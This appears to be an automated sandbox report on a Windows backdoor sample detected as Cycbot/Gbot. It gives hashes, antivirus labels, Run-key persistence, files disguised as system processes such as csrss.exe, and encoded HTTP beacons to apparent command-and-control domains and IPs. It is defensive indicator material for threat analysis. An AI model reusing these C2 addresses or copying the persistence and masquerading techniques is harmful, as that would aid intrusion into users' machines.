Analysis Date: 2014-11-19 13:13:36
MD5: 32746b28d1f8afb62b6a50520d172024
SHA1: 77b60d45102712763489fe226c2def3dc8f003b7

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 0df2635cee41738b78d01651b6b7a4c2 sha1: 992029d16d7301585a2c724ef1cadf5b5443b594 size: 105984
Section .rdata md5: 91ef994b026f963c8ba12bfe3e1848ae sha1: 76e9f58238d6312c3a36dae72c48304d64dee370 size: 1024
Section .data md5: 81b787e3d732ff348c61576678791df3 sha1: 8a6d82c91e3000a443d4920fcc081619a17fc7d5 size: 70144
Section .reloc md5: 53a5d592a0f7fde65b26f4b8279f45e5 sha1: 09c619af4d16cfb6d4b26ce5409ef96fc1c53514 size: 1024
Timestamp: 2005-09-16 12:26:55
PEhash: 3e041bf39703d2d6945cc0cc07b96c996f085821
IMPhash: c3e002070f7c2f1af8a48b0cd0b852a0
AV 360 Safe: Gen:Heur.Conjar.5
AV Ad-Aware: Gen:Heur.Conjar.5
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.ZPACK.Gen
AV BullGuard: Gen:Heur.Conjar.5
AV CA (E-Trust Ino): Win32/Cycbot.G!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Gbot-449
AV Dr. Web: BackDoor.Gbot.69
AV Emsisoft: Gen:Heur.Conjar.5
AV Eset (nod32): Win32/Kryptik.SXV
AV Fortinet: W32/Kryptik.SMY!tr.bdr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV F-Secure: Rogue:W32/OpenCloud.A
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.n
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.5
AV Rising: Backdoor.Win32.Cycbot.a
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen7
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: 127.0.0.1
Winsock DNS: coolmediastore.com
Winsock DNS: onlinesearchdb.com
Winsock DNS: onlineinstitute.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: onlineinstitute.com
Type: A
67.227.195.200
DNS: zonedg.com
Type: A
141.8.225.80
DNS: zonedg.com
Type: A
141.8.225.80
DNS: yourblogresources.com
Type: A
DNS: onlinesearchdb.com
Type: A
DNS: coolmediastore.com
Type: A
HTTP GET: http://onlineinstitute.com/g7/images/logo4.jpg?v31=80&tq=gKZEtzyuxWPd3MPuPjzR4qUIBGY2NhO5ThZ6oXRDB5mQ0TGo%2B5BuKArzwuDO9uRvyIVwPRdtRf3W5AICPs8Gn3gHjLLM5WEX2Ag2DgrVnvJWO9dkJiqEV45sgH6ZJBtcowD0OsBiORm58wN10FVNeq%2BMxJWc2XWkPAHU3do9LtUnKDgdZ8DMJ05Md6p%2BHAFXzXx7GboOorcHAddG%2Bv8nfAwXsA5mFlDecfMTEPJ8s0GBmlOVuGKGn1sTnEP92sXhT%2FfE4fTwfua%2FFF51up0Sp61oVuyrk%2BLHffx2r0NRKCgmkkmMIABzu5T%2F%2FnsXXEl4JnLQj3BI0YfhMqfCDz6Q9ZOArVDpVkueYA16qO18mZgVE%2FrAnqnSeCtSjhAKoIueUQ3dIjxWmrrt
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqJSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 67.227.195.200:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80

Raw Pcap

Strings